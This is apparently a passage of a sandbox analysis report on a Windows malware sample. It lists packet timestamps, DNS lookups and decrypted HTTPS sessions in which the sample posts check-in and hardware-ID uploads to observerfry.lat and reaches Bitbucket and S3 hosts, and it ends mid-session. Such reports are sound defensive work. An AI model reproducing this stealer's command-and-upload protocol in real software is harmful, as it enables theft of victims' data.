                                                                                                                                                              Dec 24, 2024 11:22:43.330132008 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.331068993 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.332938910 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.332979918 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.333015919 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.333069086 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.333107948 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.333127975 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.333157063 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.348599911 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504105091 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.504160881 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.504183054 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504192114 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.504230022 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504259109 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.504271030 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507430077 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507472992 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507499933 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.507505894 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.507574081 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.507579088 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510154009 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510202885 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510222912 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.510251999 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.510271072 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.510325909 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.510371923 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513719082 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513763905 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513780117 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.513787031 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.513835907 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.513845921 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.514039040 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.516608953 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.516654015 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.516701937 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.516707897 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.516716957 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.516772985 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.517435074 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.517544031 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.520122051 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.520168066 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.520236969 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.520242929 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.520291090 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.520296097 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.521862030 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523147106 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.523191929 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.523224115 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523232937 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.523262978 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523300886 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.523305893 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526715994 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526762962 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526777983 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.526783943 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526834011 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.526849031 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.526899099 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.540872097 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.697860956 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.697913885 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.697989941 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.698019028 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.698035002 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.698456049 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.698462963 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700546026 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700599909 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700614929 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.700624943 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700671911 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.700694084 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.700740099 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704138041 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.704185963 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.704216003 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704221010 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.704282999 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704282999 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.704297066 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.706991911 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.707036018 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.707077980 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.707084894 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.707102060 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.710479021 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710530043 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710551023 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.710556984 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710597038 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.710640907 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.710691929 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.712780952 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.712955952 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.713532925 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.713577032 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.713594913 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.713603020 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.713639975 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.713685036 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717233896 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717272997 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717308044 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.717314005 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.717339993 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.768440962 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.768465996 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.815289021 CET49784443192.168.2.616.182.108.137
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 11:22:14.303999901 CET | 60154 | 53 | 192.168.2.6 | 1.1.1.1
Dec 24, 2024 11:22:14.535660982 CET | 53 | 60154 | 1.1.1.1 | 192.168.2.6
Dec 24, 2024 11:22:36.783044100 CET | 64432 | 53 | 192.168.2.6 | 1.1.1.1
Dec 24, 2024 11:22:36.922230959 CET | 53 | 64432 | 1.1.1.1 | 192.168.2.6
Dec 24, 2024 11:22:39.408106089 CET | 59193 | 53 | 192.168.2.6 | 1.1.1.1
Dec 24, 2024 11:22:39.690660000 CET | 53 | 59193 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 11:22:14.303999901 CET | 192.168.2.6 | 1.1.1.1 | 0xc280 | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:36.783044100 CET | 192.168.2.6 | 1.1.1.1 | 0x4e0d | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.408106089 CET | 192.168.2.6 | 1.1.1.1 | 0x921a | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 11:22:14.535660982 CET | 1.1.1.1 | 192.168.2.6 | 0xc280 | No error (0) | observerfry.lat |  | 104.21.36.201 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:14.535660982 CET | 1.1.1.1 | 192.168.2.6 | 0xc280 | No error (0) | observerfry.lat |  | 172.67.199.72 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:36.922230959 CET | 1.1.1.1 | 192.168.2.6 | 0x4e0d | No error (0) | bitbucket.org |  | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:36.922230959 CET | 1.1.1.1 | 192.168.2.6 | 0x4e0d | No error (0) | bitbucket.org |  | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:36.922230959 CET | 1.1.1.1 | 192.168.2.6 | 0x4e0d | No error (0) | bitbucket.org |  | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 16.182.108.137 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.217.224.161 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.30.124 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.11.141 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 54.231.134.185 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.3.139 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.30.199 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:22:39.690660000 CET | 1.1.1.1 | 192.168.2.6 | 0x921a | No error (0) | s3-w.us-east-1.amazonaws.com |  | 16.15.176.27 | A (IP address) | IN (0x0001) | false
                                                                                                                                                              • observerfry.lat
                                                                                                                                                              • bitbucket.org
                                                                                                                                                              • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:15 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 8
                                                                                                                                                              Host: observerfry.lat
2024-12-24 10:22:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                              Data Ascii: act=life
2024-12-24 10:22:16 UTC | 1117 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:16 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=fb162pkctdcutlldv4i6rilde5; expires=Sat, 19 Apr 2025 04:08:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdIRwGc9hCyL57BhaNDuv63OocoIFK6K87YTKAOdfTQk0YgwNFsgEnqbZRwLZw0JA22pLoATp8VGgX29DKou83grIcoM03YtSGayi1fLsgoX7kJUGbTXTQnQsLcd6QkFFHk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fde863f401a28-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1956&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1469552&cwnd=138&unsent_bytes=0&cid=b54e6378350c883d&ts=783&x=0"
2024-12-24 10:22:16 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                              Data Ascii: 2ok
2024-12-24 10:22:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:17 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 53
                                                                                                                                                              Host: observerfry.lat
2024-12-24 10:22:17 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-24 10:22:18 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=cmns8npo8uptde5uko2mupdbei; expires=Sat, 19 Apr 2025 04:08:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EK8%2B9lS%2FQWFqIpsN7x5uGAnu7Tspjz6%2ByoGSAuZKGvioaG2FVQLvw4UT7ATMsJiK%2Bd81cvTKriI8gmEoik4i46DDP0OBCsNz34IjUWScB30WyeHRWBI%2B%2FxXxB9evWip6a4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fde92cc35431f-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1562&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1802469&cwnd=249&unsent_bytes=0&cid=82d6f977f16fcb10&ts=789&x=0"
                                                                                                                                                              Data Ascii: LvuOVhhLfn5tdByFtcsJWY1UVslGjA2PrSwniUoIxpQz+49jBMtOTiF0dclN8wHprREOuYe5SZb0AXJsFgjGxDP7j4sEk16adSxgjFjHLTiQbFZMu/0B88gRA5QuaL5cMrbXK1jHCgpNWAF0YKZgKNhEH/3GtXFO/S1CbE/sv6Vrm+5+IcsbJxhpWYEpjyltyQBKTUMpVZvYbVsxEgnjpQ+b79IY705KPTBxzXzHzFiRbFfUu2EBi/wxHygblIK
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 38 38 63 2f 32 38 57 51 55 52 46 6b 53 47 66 58 46 47 78 41 54 37 64 51 30 32 68 67 39 77 78 4c 33 45 33 6b 46 75 6b 43 35 71 79 4e 6e 67 75 55 77 64 35 6c 58 79 4e 41 4d 5a 51 59 55 55 42 62 6f 32 6e 37 55 69 48 5a 4b 47 76 68 43 65 34 78 76 41 36 53 70 4e 33 58 4f 64 6d 46 33 68 52 52 5a 52 67 70 6e 42 59 6b 52 30 54 74 4e 72 30 52 4e 36 52 59 42 6f 73 5a 33 58 69 77 44 4c 44 6a 6c 5a 52 38 6c 4a 76 65 41 6c 45 6b 57 32 50 65 58 6d 64 56 56 75 70 51 30 32 52 69 39 67 70 48 79 31 7a 4e 43 4a 64 5a 70 61 33 44 77 53 54 46 79 64 41 61 48 69 4d 41 53 49 77 51 4a 48 77 62 37 58 61 74 47 79 7a 45 43 46 2f 56 54 4e 51 6e 35 47 75 6f 70 4d 7a 51 49 73 4f 47 33 68 52 52 5a 52 67 70 6e 68 59 6b 52 30 54 74 4e 72 30 52 4e 36 52 59 42 6f 73 5a 33 58 69 77 44 4c 44
                                                                                                                                                              Data Ascii: 88c/28WQURFkSGfXFGxAT7dQ02hg9wxL3E3kFukC5qyNnguUwd5lXyNAMZQYUUBbo2n7UiHZKGvhCe4xvA6SpN3XOdmF3hRRZRgpnBYkR0TtNr0RN6RYBosZ3XiwDLDjlZR8lJveAlEkW2PeXmdVVupQ02Ri9gpHy1zNCJdZpa3DwSTFydAaHiMASIwQJHwb7XatGyzECF/VTNQn5GuopMzQIsOG3hRRZRgpnhYkR0TtNr0RN6RYBosZ3XiwDLD
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 74 6d 47 6d 52 67 78 5a 45 35 79 6a 42 59 6b 54 78 58 31 4c 75 78 4a 66 50 77 45 56 70 64 4d 32 44 48 70 41 75 61 74 6a 5a 35 79 31 59 4f 4f 56 78 35 6b 46 48 66 43 56 69 52 63 47 37 51 75 2b 77 4d 30 6f 6b 55 52 79 51 75 61 64 75 35 50 74 4c 48 4c 78 53 54 58 7a 71 42 6b 50 48 46 66 59 63 38 61 56 55 35 52 75 33 76 75 55 32 76 50 4e 58 7a 4a 54 4e 49 31 36 33 32 77 6f 4d 33 49 4e 5a 54 48 33 6b 4a 52 4f 78 68 63 33 6c 39 30 51 42 58 6a 4c 75 45 44 4e 4c 45 47 51 39 78 62 77 58 71 75 56 71 48 6a 30 6f 67 72 6c 4a 2f 65 41 6b 49 74 47 47 4f 4d 41 43 51 45 57 36 42 76 37 6b 31 76 34 78 6c 58 32 46 33 42 63 5a 64 79 69 37 48 4b 31 6a 47 57 75 4a 4e 65 42 33 5a 62 59 63 74 6d 57 6d 35 48 71 6e 37 75 41 55 44 32 42 6c 33 6c 64 66 55 6e 72 6c 7a 6b 68 63 37 51
                                                                                                                                                              Data Ascii: tmGmRgxZE5yjBYkTxX1LuxJfPwEVpdM2DHpAuatjZ5y1YOOVx5kFHfCViRcG7Qu+wM0okURyQuadu5PtLHLxSTXzqBkPHFfYc8aVU5Ru3vuU2vPNXzJTNI1632woM3INZTH3kJROxhc3l90QBXjLuEDNLEGQ9xbwXquVqHj0ogrlJ/eAkItGGOMACQEW6Bv7k1v4xlX2F3BcZdyi7HK1jGWuJNeB3ZbYctmWm5Hqn7uAUD2Bl3ldfUnrlzkhc7Q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49721 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:20 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=AK1OA31E9
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 12811
                                                                                                                                                              Host: observerfry.lat
2024-12-24 10:22:20 UTC | 12811 | OUT | Data Ascii:
--AK1OA31E9
Content-Disposition: form-data; name="hwid"

7CDF789295067FF1BEBA0C6A975F1733
--AK1OA31E9
Content-Disposition: form-data; name="pid"

2
--AK1OA31E9
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--AK1OA31E9
Conten
2024-12-24 10:22:21 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=mvbvo48v0ngs99attplq4otjov; expires=Sat, 19 Apr 2025 04:09:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYdnZEHWdihWw3MQOoj6sHphW1hPnd8LOROHPdOH9b87VTf5%2FffOK7espiT33TEq74k3d9JSl0%2FxStkWACSSRVOs2HNiZ2CMErfoujVVlqiJoj30xblQFuVohxl55i6MUUw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdea44c837d18-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1978&rtt_var=744&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13741&delivery_rate=1468074&cwnd=218&unsent_bytes=0&cid=a27d23238b1ce688&ts=1068&x=0"
2024-12-24 10:22:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 10:22:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49728 | 104.21.36.201 | 443 | 404 | C:\Users\user\Desktop\fnCae9FQhg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:22:23 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=E8YHW9WJ7TL56BA
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 15093
                                                                                                                                                              Host: observerfry.lat
2024-12-24 10:22:23 UTC | 15093 | OUT | Data Ascii:
--E8YHW9WJ7TL56BA
Content-Disposition: form-data; name="hwid"

